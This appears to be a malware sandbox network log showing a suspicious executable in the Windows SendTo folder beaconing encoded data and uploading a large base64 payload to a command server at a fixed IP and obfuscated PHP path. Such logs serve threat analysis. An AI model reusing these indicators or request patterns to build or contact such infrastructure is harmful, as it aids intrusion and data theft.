                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:47.144715071 CEST2532OUTData Raw: 5e 55 46 53 55 4a 59 56 59 5f 51 51 52 5b 54 5b 5a 5f 5a 51 55 50 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UFSUJYVY_QQR[T[Z_ZQUPSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+?4"#9>&??+; Q?'#Q$9+% Z&9[&!^-+
                                          Sep 13, 2024 21:02:47.754014015 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:47.754252911 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:47 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.45668531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:47.838259935 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2084
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:48.191454887 CEST2084OUTData Raw: 5b 56 46 54 50 44 59 52 59 5f 51 51 52 5f 54 51 5a 5a 5a 5c 55 51 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VFTPDYRY_QQR_TQZZZ\UQSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*/"X!":4:*]&=?=[*$+/:3 &)'E1/(^19[&!^-;
                                          Sep 13, 2024 21:02:48.591243029 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:48.733670950 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:48 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0b 28 08 01 55 33 5d 27 55 2c 2d 25 0b 24 3c 27 02 3f 0a 3a 19 2b 03 1d 02 2d 14 2a 59 27 2b 2a 04 24 2f 2f 1f 27 11 33 56 2a 00 2e 46 0d 1d 25 15 3d 01 3c 1f 29 58 2b 02 24 00 35 58 20 09 3b 17 25 3c 33 53 34 2c 2e 10 23 1c 0d 54 32 2a 3d 10 2f 1b 21 03 29 0f 2d 03 34 26 2e 55 0f 15 3a 0a 32 31 2d 0d 3c 32 24 01 29 2c 39 0d 32 2c 30 0f 26 38 2f 0e 27 38 2a 10 25 01 36 02 27 22 3f 5d 2a 3d 39 1d 21 21 0c 56 21 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:(U3]'U,-%$<'?:+-*Y'+*$//'3V*.F%=<)X+$5X ;%<3S4,.#T2*=/!)-4&.U:21-<2$),92,0&8/'8*%6'"?]*=9!!V!'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.45668631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:49.181514978 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:49.535268068 CEST2532OUTData Raw: 5e 52 43 52 50 40 59 5c 59 5f 51 51 52 5c 54 54 5a 58 5a 5c 55 51 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RCRP@Y\Y_QQR\TTZXZ\UQS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9D(Y 9Y7.)+<>)(0Q<?:'#,U%+C%%+9[&!^-7
                                          Sep 13, 2024 21:02:49.943908930 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:50.102324009 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:49 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.45668731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:50.328262091 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:50.675854921 CEST2532OUTData Raw: 5b 54 43 56 55 40 5c 57 59 5f 51 51 52 5f 54 55 5a 5a 5a 51 55 51 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TCVU@\WY_QQR_TUZZZQUQSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<2 1^"#9\)+5?/*;(U+%$?&*?E&?<Y&+9[&!^-;
                                          Sep 13, 2024 21:02:51.100763083 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:51.253108978 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:51 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.45668831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:51.952894926 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:52.300848961 CEST2532OUTData Raw: 5b 55 43 51 55 44 5c 57 59 5f 51 51 52 5a 54 53 5a 52 5a 50 55 54 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UCQUD\WY_QQRZTSZRZPUTSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+,* :7#.(;=?9*88?<.0+2;2 %+9[&!^-/


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.45668931.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:52.340390921 CEST624OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----laBTLt9kYlbCauPgGBWN8RSk4u1OCrMbUc
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 175938
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:52.691551924 CEST12360OUTData Raw: 2d 2d 2d 2d 2d 2d 6c 61 42 54 4c 74 39 6b 59 6c 62 43 61 75 50 67 47 42 57 4e 38 52 53 6b 34 75 31 4f 43 72 4d 62 55 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                          Data Ascii: ------laBTLt9kYlbCauPgGBWN8RSk4u1OCrMbUcContent-Disposition: form-data; name="0"Content-Type: text/plain^TCQUJ\WY_QQRXTRZZZ^U^SFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY
                                          Sep 13, 2024 21:02:52.698896885 CEST7416OUTData Raw: 76 74 65 74 6e 2f 48 52 6f 59 37 4f 59 61 72 77 53 34 72 31 7a 66 48 31 4d 31 6d 36 76 6c 7a 76 4b 2b 58 74 47 68 51 6b 6f 66 6f 39 32 46 2f 33 62 72 50 64 59 52 70 41 50 62 42 64 6a 32 74 2f 55 32 64 4f 58 32 36 74 63 52 54 4d 4f 7a 53 70 78 33
                                          Data Ascii: vtetn/HRoY7OYarwS4r1zfH1M1m6vlzvK+XtGhQkofo92F/3brPdYRpAPbBdj2t/U2dOX26tcRTMOzSpx3uj8CYWn4ppavhcURaFqOl/VzIzwPFnV+gXl9QlrMygzsPxvHkhvfBLd7b7ElEJvXkDjrFLNtpZPEM6lt5Y3eXvs6meyIgRhQrewMtHXpa50IFZ/vBV6FZe1+Oy7qPcD/4KXK6dJxYT8TVeI9jHy8o/Ng6SLn+uCF/
                                          Sep 13, 2024 21:02:52.699021101 CEST4944OUTData Raw: 7a 47 41 77 39 4c 73 70 56 76 4f 50 62 79 59 2f 4a 75 43 70 67 63 6b 58 67 56 75 30 72 38 6f 71 57 5a 34 48 6e 72 45 65 43 71 74 52 4a 36 41 35 46 41 62 33 68 6d 79 4d 69 39 79 74 6d 4d 52 66 43 6a 6a 48 66 74 6d 6a 72 6c 6f 73 2b 36 58 68 33 69
                                          Data Ascii: zGAw9LspVvOPbyY/JuCpgckXgVu0r8oqWZ4HnrEeCqtRJ6A5FAb3hmyMi9ytmMRfCjjHftmjrlos+6Xh3iJ+najyzgRr0eauafhlxeSl5+krsaHPRTZQn0QbzwbG7jZjCdqsp/VfFnVrnrapoH/4JmKnonJLMZB4HnMW1BAqJGDimfJ+hvLUjd8bJ1RMJ2R186xE8OjatzLLD2hP17SI82JnDRI8QoZbbZTK2Ri6DB3is8xgJtE
                                          Sep 13, 2024 21:02:52.699040890 CEST2472OUTData Raw: 52 30 55 6b 6f 47 73 32 35 66 41 58 67 5a 44 2f 54 4e 6f 4b 33 53 6c 6d 4f 73 67 53 56 4e 42 52 63 56 2f 79 76 64 43 44 6c 73 4c 61 55 33 64 50 33 62 30 38 53 38 33 70 4c 48 72 65 73 39 4e 7a 36 50 35 59 78 2f 33 4c 4c 39 30 6b 76 67 74 55 54 45
                                          Data Ascii: R0UkoGs25fAXgZD/TNoK3SlmOsgSVNBRcV/yvdCDlsLaU3dP3b08S83pLHres9Nz6P5Yx/3LL90kvgtUTEjMLi0dLxI7PnYFd/IEJ9vLJLCOckTwhFW7D7P3vVtuN53YIQECzznTjUpUDZ/Iuv6tkVTCwhgDhF+IC08d9qqSq0P+59dOHUL/tzIbyMVaGZz6b9KYTp17kXzMCCBXkfyLhklqq18lp5spIUnkbwJQF4QAZUmG5LI
                                          Sep 13, 2024 21:02:52.699223042 CEST4944OUTData Raw: 35 53 31 65 79 34 79 77 7a 31 39 4e 69 55 42 30 78 38 34 2f 45 63 74 2b 4d 51 4e 42 79 6b 42 39 4c 31 4f 34 4f 66 4d 4c 62 6f 6d 45 58 64 4d 46 6f 49 34 6c 6e 35 58 59 6a 38 57 32 33 6b 54 67 58 41 50 68 53 39 39 35 57 55 4a 50 58 4f 62 75 57 54
                                          Data Ascii: 5S1ey4ywz19NiUB0x84/Ect+MQNBykB9L1O4OfMLbomEXdMFoI4ln5XYj8W23kTgXAPhS995WUJPXObuWTMqy+A/9QQV1hdHz8nGJYjPdDuEe7713w7OMxE4BfHKKSMD9kkld5Z2LhvefWWy0nkhOYuWhffx5rf2mF3TdJ+ukGuFxk2pfYUr7NLi0kMZlowYM5svBh8nUYtWsghM+HRNplVo47s+oc7OdfhE4J7zr5Qxp9R7uR9
                                          Sep 13, 2024 21:02:52.699234962 CEST2472OUTData Raw: 32 33 33 30 6d 49 68 41 6e 58 33 6c 42 35 62 68 53 6b 35 54 6d 72 4f 72 62 62 49 73 4c 58 4b 50 49 44 58 76 2f 52 49 39 4e 6b 46 33 76 79 33 79 6c 53 62 51 75 67 74 34 70 63 30 6f 75 4c 70 31 35 6e 64 67 37 32 6e 70 4f 6a 39 68 37 68 75 70 4b 45
                                          Data Ascii: 2330mIhAnX3lB5bhSk5TmrOrbbIsLXKPIDXv/RI9NkF3vy3ylSbQugt4pc0ouLp15ndg72npOj9h7hupKEmYK1bIjfsh3HuwK7u8axZz9wL6b2y6YE0vfuCwK+vr9Pur8dABc/6SIiLwbTxY5PMKv5sUWHpMz+lBRcT0VYRNza1r6fMOdNXtABUfc0OnZyLGzgf2qbqegf9v1l9TaxEmafGVNg9NKtBlo5ZpH5m80KINdafXUgV
                                          Sep 13, 2024 21:02:52.699482918 CEST2472OUTData Raw: 58 54 76 41 66 6c 47 54 47 6c 2f 4e 54 4d 76 79 33 58 6c 35 65 63 36 74 79 37 6a 75 54 69 4a 31 36 74 2f 65 33 6b 34 69 6b 4a 67 35 54 32 31 63 66 61 6e 56 31 73 33 4e 33 76 71 36 6f 51 46 66 62 31 50 6b 4a 6f 75 74 47 52 2f 73 5a 42 37 62 78 34
                                          Data Ascii: XTvAflGTGl/NTMvy3Xl5ec6ty7juTiJ16t/e3k4ikJg5T21cfanV1s3N3vq6oQFfb1PkJoutGR/sZB7bx4jn/hPmse1+Oe9fFWX3dgx1L6SwrrUx7oVscdsjA3RXvn33h94PI7R3PFwpvnJ9PaT0zApe8znnW474MrrNUN4M337t8prvb1LsU1eVx0fOaUbKGF1qO89l8y7vrDTwhDptP3Wg+NIlyOOi1dW12ZW9ZKPWySnjlMP
                                          Sep 13, 2024 21:02:52.705367088 CEST7416OUTData Raw: 6b 74 62 41 53 54 39 2b 74 63 2b 54 43 47 7a 33 57 45 66 77 73 75 4e 5a 6a 62 76 71 61 7a 6d 65 6b 47 36 69 39 67 72 4f 64 75 51 50 64 6b 31 6c 56 64 41 79 33 6f 4e 7a 79 79 59 63 42 66 2f 4b 59 49 7a 71 47 6b 67 50 52 79 44 65 4e 7a 56 7a 51 44
                                          Data Ascii: ktbAST9+tc+TCGz3WEfwsuNZjbvqazmekG6i9grOduQPdk1lVdAy3oNzyyYcBf/KYIzqGkgPRyDeNzVzQDCDXOnUDDs7WJ5EdCIMV3QFtPoZbwjD2ir0DMd3BxZRy7dDkYUjt1Jn8xGSkwuiibjvLVf1+FQVDvSbFXakblXwYZwPWH8dKmaZG1hfrSiC9yBjrjffPNis39Gs3Jth2msRZnz5A8a6/NNL+Ulb3tye5R3W8jrmuMd
                                          Sep 13, 2024 21:02:52.705396891 CEST4944OUTData Raw: 66 72 4f 30 42 2f 30 7a 69 62 57 6a 35 76 59 55 75 6c 64 72 4a 7a 2f 4e 4a 72 76 46 75 54 75 38 75 4e 67 31 75 52 47 4b 74 63 6b 4d 37 31 55 33 73 70 58 76 31 56 4d 67 41 6d 6e 47 57 74 4d 70 6a 73 67 6a 52 65 68 7a 39 34 47 4d 4a 79 51 47 59 4b
                                          Data Ascii: frO0B/0zibWj5vYUuldrJz/NJrvFuTu8uNg1uRGKtckM71U3spXv1VMgAmnGWtMpjsgjRehz94GMJyQGYKwvxKKFZAFN+HrvNUsSmOjK+a8cIX3XtZzu3OBMyWVALuDMkZxbYQISLcrmBo1J29i1rXzbS6D0RccF0Cd6jgVf9LwVz9jczBzHknnkNFNV5ZO7q1Vfis38HJ82uXj6h4/dNbs+Y/Khovf1mzOsNDVICy089MsVb5d
                                          Sep 13, 2024 21:02:52.705416918 CEST2472OUTData Raw: 54 66 69 63 66 6e 33 42 36 49 76 6a 6e 2b 49 34 49 45 37 67 74 49 42 6e 67 76 44 38 6e 6a 69 74 7a 44 49 62 74 45 35 45 6c 79 6c 32 58 63 48 47 6f 30 6d 68 53 33 51 58 74 61 4c 69 32 4b 47 67 4b 51 70 65 46 6f 2f 72 53 6f 38 61 37 4a 53 55 42 48
                                          Data Ascii: Tficfn3B6Ivjn+I4IE7gtIBngvD8njitzDIbtE5Elyl2XcHGo0mhS3QXtaLi2KGgKQpeFo/rSo8a7JSUBHkXSISJIqcTvfJsM0RSB4MSob5l/Y60VnTaLTF7K5o9VHwZF1eGo9HeDwZj2QjTvGFLa+qH0Oth5XwOWuBj67oQqexjWsfYV+ixpm/ieE00YtWewDzv+wFVrFkdRXXFp5HzIyJ8Qhc/3JD5xNvZyrG5o146ZVuDNsv
                                          Sep 13, 2024 21:02:53.101778984 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:54.047341108 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:02:54.232031107 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:54.471155882 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:54.907582998 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:54 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0e 29 25 3b 57 33 05 01 52 2f 3d 0b 0e 27 01 28 5d 3c 33 32 19 2b 04 2b 01 2e 2a 2e 59 33 05 2d 5b 24 05 3c 01 33 01 06 0a 29 2a 2e 46 0d 1d 26 01 29 01 06 1f 3d 00 23 01 33 3e 0c 05 37 33 24 04 25 2c 33 1c 23 02 0c 59 37 0c 20 0f 27 2a 29 5d 2f 35 32 5e 3e 1f 26 59 23 1c 2e 55 0f 15 39 53 32 08 35 09 28 0c 38 03 3d 01 35 0d 31 3f 23 1e 32 05 0d 0b 33 5e 26 52 25 01 39 10 26 21 0d 5d 28 03 25 1d 21 21 0f 0b 21 3b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:)%;W3R/='(]<32++.*.Y3-[$<3)*.F&)=#3>73$%,3#Y7 '*)]/52^>&Y#.U9S25(8=51?#23^&R%9&!](%!!!;'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.45669031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:52.531744003 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:52.878978968 CEST2532OUTData Raw: 5b 56 46 53 50 43 59 53 59 5f 51 51 52 50 54 57 5a 5a 5a 5b 55 52 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VFSPCYSY_QQRPTWZZZ[URSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?57%\7#-X)6=/)Z)8(P)?:Y$01*81(^19[&!^-
                                          Sep 13, 2024 21:02:53.433398962 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:53.560600042 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.45669131.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:53.697665930 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:54.232038975 CEST2528OUTData Raw: 5b 57 43 53 55 47 5c 56 59 5f 51 51 52 59 54 52 5a 5f 5a 51 55 51 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WCSUG\VY_QQRYTRZ_ZQUQSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+/42!X##Z>V(?"++<P+<>'3'%:@$/%9[&!^-'
                                          Sep 13, 2024 21:02:54.450277090 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:54.584763050 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:54 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.45669231.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
